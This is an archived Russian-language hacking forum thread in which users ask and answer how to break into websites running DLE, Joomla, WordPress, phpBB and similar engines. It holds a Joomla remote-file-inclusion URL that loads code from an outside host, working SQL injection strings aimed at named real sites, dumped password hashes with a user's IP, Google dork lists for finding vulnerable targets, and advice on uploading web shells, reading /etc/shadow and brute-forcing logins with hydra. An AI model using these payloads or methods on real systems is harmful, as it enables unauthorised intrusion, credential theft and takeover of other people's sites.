Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
на майл.ру в куках пароль не хранится, ты можешь только подменить куки и зайти на ящик жертвы, и то при условии если сессия не умерла
mailbrush
26.03.2009, 18:47
Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.
problema
26.03.2009, 18:56
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.
ОМГ сервис для расшифровки куки от mail.ru который добудет пароль?
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.
Можно ссылку хоть на один подобный сервис ? :)
plain-text.info - самый навороченный
hashcracking.info - сервис ачата
--
а вообще по сабжу майл.ру это мало чем поможет
-Hormold-
27.03.2009, 01:46
plain-text.info - самый навороченный
hashcracking.info - сервис ачата
http://rafal.jelito.org/md5.php - думаю это лучше всего...
kasper666
27.03.2009, 16:18
Посоветуйте двиг для форума. Не глюкавый. Быстрый.
имхо лучший vBulletin
быстрый SMF
http://yamegastar.ru/ тут открыт раздел plugins. там я нашёл вроде как бы скрипт, для переименование картинок...когда заливаешь туда авы, фотки, он переименовывает их. можно как нить над ним поколдовать и послать запрос на переименование файла из .gif в .php. если нет, то что тогда можно?)))))))
P.S. Если я туплю так и скажите =) я полный ноль в этом деле)))) учусь.
спасибо ребятушки =)
-m0rgan-
03.04.2009, 22:26
trat1g, я не представляю как это =/
Со скриптом не работал, но из моего опыта скрипты такого рода проверяют расширение загружаемого файла, и переиминовуют то что стоит скажем перед .gif
Есть phpizabi.net - PHPizabi 0.848b C1
её взломал(уже не первый раз)
By_MuCaHiT (DarkKnight) ~ Real_Karizma
перезаписан conf.inc файл.
вопрос: как защитить движок от взлома? кто сталкивался с такими траблами?
-=Nicon=-
04.05.2009, 18:44
Есть сайт на IP.Board 2.3.1 хочу его взломать, кто может подсказать какие есть уязвимости у этой CMS системы.
mailbrush
04.05.2009, 18:47
Это не cms, а форум. Целая тема по уязвимостям есть http://forum.antichat.ru/thread89112.html.
Люди, кто знает уязвимости на файлообменнике Letitbit ? можно ли его ломануть ?
топором по серверу, может и ломонешь, если ты о обходе таймера - юзай прокси или плагин (уже 100 лет как есть) что бы сразу показывало ссылку на скачивание
если ты про такие вещи как дефейс, от скажу: ололо
Можно ли узнать текущий пароль пользователя на сайте с движком DLE 8 версии???
доступ к базе вроде получил, скачал. зашифрованый пароль где то тут:
'e7e4806514adfd4171437dfd51f9e495', 'eric', 4, 0, 1, 3, '1241397821', '1240442341', '', 1, '', '', '', '', '', '', '', 0, 0, '', '', '', '', '194.186.188.36', 0, 0, ''),
кто умеет отпишите в личку. или сюда способ.
Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
-=Razor=-
07.06.2009, 03:48
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии
Exploit: http://milw0rm.com/id.php?id=44
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.
Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll.
при запросе
index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/*
ошибок нет, слепой тоже вроди нету.
при запросе
index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/*
Выдаёт ошибку следующего вида
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id= далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно
если это поможет вот этот эрор из исходника страницы
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go(-1);" />
Собсно подскажите чё с этим можно сделать ибо я в потерях.
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
KaZ@NoVa
14.06.2009, 21:38
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян...
А вообще попробуй его подгрузить как картинку если есть такая возможность..
вот здесь искал??
http://damagelab.org/lofiversion/index.php?t=16780
MaXoH999
15.06.2009, 19:43
Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
Подскажите как залить шел в админке mambo 4.0.14 Stable.
мамботы, компоненты, модули... обично такип образом заливал, но в данной версии такого вообще нет.
MaXoH999
16.06.2009, 01:57
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль?
Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?
Dark_cracker
16.06.2009, 11:23
или узнать фтп логин и пароль?
Ищи через шелл файлы-логи на серваке может там чё нить нароешь, и ещё посмотри этот файл etc/shadow (если есть права).
Как сбрутить хеши из WordPress'a ?
На hashcracking.info пишет: Тип хеша неопределен!
nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1
malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/
SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1
Dark_cracker
16.06.2009, 12:49
Как сбрутить хеши из WordPress'a ?
На hashcracking.info пишет: Тип хеша неопределен!
nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1
malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/
SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1
Через программы (passwordspro), брутом, у wordPress хеш + соль тебе в этот раздел _http://forum.antichat.ru/thread46700.html
Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это :)
P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.
KaZ@NoVa
16.06.2009, 19:03
Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это :)
P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.
а в админку доступ есть?
кинь сайт какой нидь с этой байдой
2KaZ@NoVa
в админку доступ есть, сайт находится в локалке.
DATA_batona
22.06.2009, 01:56
Народ, подскажите плиз, где искать дыру для шелла http://tonystudio.ru/wordpress/wp-content/plugins/
теорию вроде прочитал, а на практике - хожу по кругу, не найду где зацепится. если можно, пинок в нужном направлении.
З.Ы. ссори если не туда запостил.
GL_Loney
22.06.2009, 22:25
Парни, если не сложно подскажите самый оптимальный движег для mmorpg , чтобы и не сложный был и поюзать не плохо можно было -_- спасибо заранее.
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)
какие есть варианты залития шелла в тп1.0.1 без аддминки???
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)
никак
Народ, подскажите плиз, где искать дыру для шелла http://tonystudio.ru/wordpress/wp-content/plugins/
теорию вроде прочитал, а на практике - хожу по кругу, не найду где зацепится. если можно, пинок в нужном направлении.
З.Ы. ссори если не туда запостил.
http://www.google.com/search?q=wordpress+vuln
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)
Что-то из серии "как трахнуть девушку, не доставая член". В любом случае придется получить каким-то образом рут доступ, сплоитом или вручную - это уже другой вопрос.
Почему на таких движках как, например, DLE, Vbulletin при эксплуатации XSS приходит только часть куков. То есть самое интересное (hash пароля, например) не приходит на сниффер.
Есть ли варианты решения этой проблемы?
потому что не хранится хэш в куках
Но ведь если заглянуть у себя в куки, то там находится больше параметров, чем приходит на сниффер. Например id сессии на сниффер не приходит. Почему?
Но ведь если заглянуть у себя в куки, то там находится больше параметров, чем приходит на сниффер. Например id сессии на сниффер не приходит. Почему?
сессия живет ограниченное колличество времени
Ладно. Возьмём DataLife Engine. Если в адресную строку ввести javascript:alert(document.cookie), то я увижу только два параметра из кукисов:
PHPSESSID=bc0c66c56778c89daca4f2c001ca1695; dle_onl_session=bc0c66c56778c89daca4f2c001ca1695
А если в Опере зайти в "Управление cookies", то там увижу ещё такие параметры, как: dle_password, dle_user_id и т.д. Возникает вопрос, почему скрипт выплёвывает не всё содержимое кукисов (точно так же и на сниффер приходит только 2 ненужных параметра)? Куда деваются dle_password, dle_user_id? Никто не подскажет? :)
aydin-ka
12.08.2009, 15:18
Есть ли уязвимость в UcOz ????
Есть доступ к dle админке, версия 7.3.
Включил возможность добавлять файлы, но к новости так прикрепить и не смог.
Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
Какие есть способы залить шел?
Есть доступ к бд, где таблицы dle полный (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?
как быстро найти уязвимые сайты?
1. milw0rm.com
2. в эксплойтах обычно пишут dork: "что-то"
3. ищещь дорк в гугле и юзаешь сплойт)
1. milw0rm.com
2. в эксплойтах обычно пишут dork: "что-то"
3. ищещь дорк в гугле и юзаешь сплойт)
как найти уязвимый сайт, для инекции, не юзать гугл на пример запросами типа
inurl:"download.php?id="
inurl:"downloads.php?id="
inurl:"index.php?id="
inurl:"sql.php?id="
inurl:"page.php?id="
inurl:"site.php?id="
inurl:"open.php?id="
inurl:"catalog.php?id="
inurl:"register.php?id="
inurl:"make.php?id="
inurl:"good.php?id="
inurl:"mp3.php?id="
и к каждой станице подставлть (')
Help! Слил базу с сайта. Теперь проблема слить сам сайт- самопис. При попытке запаковки выдаёт- Can't call archivator (tar cfzv..... Хотя при дампировании Sypex-ом нормально заархивировалось.
Не представляю что ещё можно сделать. Подскажите.
Help! Слил базу с сайта. Теперь проблема слить сам сайт- самопис. При попытке запаковки выдаёт- Can't call archivator (tar cfzv..... Хотя при дампировании Sypex-ом нормально заархивировалось.
Не представляю что ещё можно сделать. Подскажите.
pixelbeat.org/cmdline_ru_RU.html
compdoc.ru/os/linux/commands_linux_command_line/
Помогите взломать сайт Joomla ! ver. 1.0.9
Я вытащил хэш с помощью exploit. А расшифровать увы не получается.
allinurl:"com_frontpage"
inurl:"/index.php?option=com_frontpage"
Можно ли вытащить пароль с сайта ?
И ещё почему когда я пытаюсь сохранить exploit под названием Joomla <= 1.0.9 Weblinks blind SQL injection он сам удалятся ?
А каким вообше образом можно попасть на диск C какого нибудь сайта?
А каким вообше образом можно попасть на диск C какого нибудь сайта?
если именно в диск С, то как минимум нежно найти уязвимый сайт, который работает на сервере который работает на Windows платформе, с помощью которой нужно залить шелл и получить как минимум права на выполнение команд на стороне сервера.
Кто как ищет?есть ли какие-то конкретные способы их поиска,если сообщения об ошибках не выводятся.
спасибо! :)
можно поискать раскрытие путей или старые ошибки в кеше гугла, также если есть возможность просматривать локальные файлы например через скулю можно угадать путь до конфига апача или логов и там спалить пути или тупо самому подобрать.
HAXTA4OK
26.08.2009, 11:00
можно пытать счасьтье так sait.ru/index.php?id[]=
если есть load_file у тебя то вот тебе http://forum.antichat.ru/thread49775.html
там куча путей подставляй , ищи *conf в нем прописан путь
пробуй искать файлы кторые инклудятся , иногда пройдя по ним можно увидеть тож путь
Народ кто нить заливал шелл в ВП 2.7.1 ?
админка разумееться есть
Аналогично 2.3.3 MU,разрешал загрузку пхп файлов,всеравно труба :confused:
если неошибась в админке есть возможность редактировать файлы если конечно права позволяют.
где именно?
в Theme Editor
в редакторе тем не когда прав нету, другие варианты есть?
раньше канало shell.jpg.php, щас уже траблы :confused:
Подскажите, можт кто знает, как раскрыть путь установки в Joomla 1.5.12 ?
Спасибо.
ATLANT_93
23.09.2009, 14:44
Как попасть в админку в joomla 1.0.12 Lavra Edition?
ввести логин:пароль, и зайти.
по ней можно найти инфу в инете,если пути в ней отличаются от стандартных джумл
ZiLiBoBa
01.10.2009, 21:54
извеняюсь скорее всего не туда пишу....но может ктонить мне объяснит что это
http://www.bruno-banani-message.de/popup.probe.php
в ВП 2.8.4 кто нить шелл заливал через админку?
Интересует ncms (ncms.ru) демка у нее не работает.
Уязвимости или сами скрипты ncms, можно в зенде, всем заранее спасибо.
CryptAnalitic
16.10.2009, 19:22
в ВП 2.8.4 кто нить шелл заливал через админку?
Есть только приватные эксплоиты к этой версии( А в чем проблема ?
CryptAnalitic
16.10.2009, 19:23
Насколько robots.txt актуален сейчас как расскрытие папок сайта?
Настолько же, насколько и раньше, то есть неактуален. Ну кто станет писать суперсекретные папки в robots.txt?!
владелец сайта, который не хочет чтобы поисковой бот индексировал некоторые стрницы
Настолько же, насколько и раньше, то есть неактуален. Ну кто станет писать суперсекретные папки в robots.txt?!
еще и как пишут))) админки в основном
Здрасте... подскажите как залить шелл через админку в ДЛЕ. Точой версии сказать не могу.
Модуль "Архив файлов" отсутствует. Добавил в допустимые файлы для загрузки расширения .php .phtml но когда добавляю новость и загружаю файл и после этого кликаю на файлик то происходит загрузка файла в виде download.php?id=7. Подскажите как выйти из ситуации
Кто-нибудь знает хотя бы один способ раскрыть пути в Drupal?
ErrorNeo
07.11.2009, 17:31
сабж
касается солей хэшей в Vbulletin
в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.
примеры 4-символьных солей
VBulletin:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
YD\
],\
W$\
]_\
Dd\
вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?
Какой тип хеша у Битрикс?
Вроде md5($pass) , но хеш странный очень:
пример - _Ah7\x2Ofb6e1ad1bf85366d9a91b6e43b87f53b
в 7-й версии битрикс использует чистый мд5 (32 символа) а в 8-й версии хеш уже 40 символов, то есть неободимо отбросить ненужные символы (salt) то есть в данном случае хеш будет выглядеть так :
fb6e1ad1bf85366d9a91b6e43b87f53b
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto
возможно что нибудь сделать?
это хотяб бы баг?:)
кто нибудь знает как залить шел в Instantcms, доступ в админку есть.
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto
возможно что нибудь сделать?
это хотяб бы баг?:)
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto
оригинал
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto
оригинал
Эм
Ошибка: У Вас нет прав для доступа к этому модулю.
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
сабж
касается солей хэшей в Vbulletin
в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.
примеры 4-символьных солей
VBulletin:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
YD\
],\
W$\
]_\
Dd\
вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?
Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:
\'*( - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью.
(&\\ - слуш экранируеться,так как последний слеш являеться частью соли.
Подругому не бывает :)
ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();
www.prima-group.kz
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9
Можно ли вытащить логин и пароль от админки
www.prima-group.kz
http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%2 8%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9
Можно ли вытащить логин и пароль от админки
Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами.
Скриптом достал спиоск таблиц,может пригодиться.
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CHANNEL
CHANNEL_NEW
CHANNEL_POLL
NEWS
NEWS1
POLL
PRICES
если можешь поделись скриптом плз можешь в личку
ЭТО НЕ СПЕЦ РАЗДЕЛ ДЛЯ ТВОИХ ВОПРОСОВ
Здесь не спрашивают как тебе поломать сайт , или что с этим можно сделать//HAXTA4OK
Подскажите чем брутить wordpress?
StarFire
06.01.2010, 04:06
Подскажите чем брутить wordpress?
hydra
hellorin
10.01.2010, 17:41
Подскажите пожалуйста есть ли какие-то уязвимости в движках:
NPJ (http://npj.ru/)
и
WebGui (http://www.webgui.org/)
Если есть то какие :)
У меня возник вопрос есть сайты у которы структуре php немного изменена
Допустим http://www.mister-wong.ru/stuff/#toolbar подвержены ли такие сайты уязвимостям типа sql inj или другим уязвимостям
sqlinjector
15.01.2010, 18:35
Уважаемые, несколько раз натыкался на всякие php скрипты - они же exploit-ы к форумам типа IPB и PHPBB, в.т.ч. и 3 версии.
Просьба: подскажите тему, где есть полная информация о том как этим делом пользоваться.
ОС, софт и тд..
Вот по инъекциям нашел такой ФАК http://www.hackzone.ru/news/sql_inj.html очень мне помог, хотелось бы и по cross site scripting-у
В общем в итоге хочется залить шелл, получить админа сайта как минимум.
пишите тут или в личку.. Большое спасибо!
kaban931
15.01.2010, 21:51
Привет всем! народ подскажите пожалуйста что означает вот эта вот ошибочка
! PHP for the selected domain has failed.
Installatron is unable to install to a domain where PHP is not working.
Your hosting provider can help you resolve this error.
Error code: 1; HTTP code: 500
Заранее спасибо!
globalDJs
21.01.2010, 20:30
Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.
Залей шелл.
Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.
//сцк,снова 2 символа
про хеши - читай:
http://forum.antichat.ru/thread155032.html
Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.
Спасибо!
Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html
вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?
cryostat13
25.02.2010, 00:24
Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];
GC0mmander
18.04.2010, 16:54
Есть ли какой-нибудь способ заливки шелла через DokuWiki?
День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blahid=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blahid=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/
aydin-ka
15.05.2010, 10:06
Как узнать версию 1c-bitrix на сайте! не имея доступ в админку????
Daedalus
26.05.2010, 21:09
подскажите пожалуйста как можно залить шелл в Webmin cms или раскрытие путей какое-нибудь
вот сайт-пример http://hotel-kyniska.gr/administration/ логин-пасс:kyniska
php код в articles фильтруется.
помогите найти админку в multishopcms http://www.multishopcms.com
помогите найти админку в multishopcms http://www.multishopcms.com
http://www.multishopcms.com/design/user/
оно forbidden же. доступ мне никак не получить?
http://www.multishopcms.com/admin.php
мде. у меня несколько сайтов на этой цмс. админ.пхп там естессн нет
Облазил весь форум, но так четко нечего и не нашел...
Покажите темы, или напишите подробно о:
Как получить доступ к админке на WordPress 2.9.2?
Каким способ лучше залить шелл (описание способа) ?
Облазил все темы с WordPress и нужную мне информацию не нашел... :eek:
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot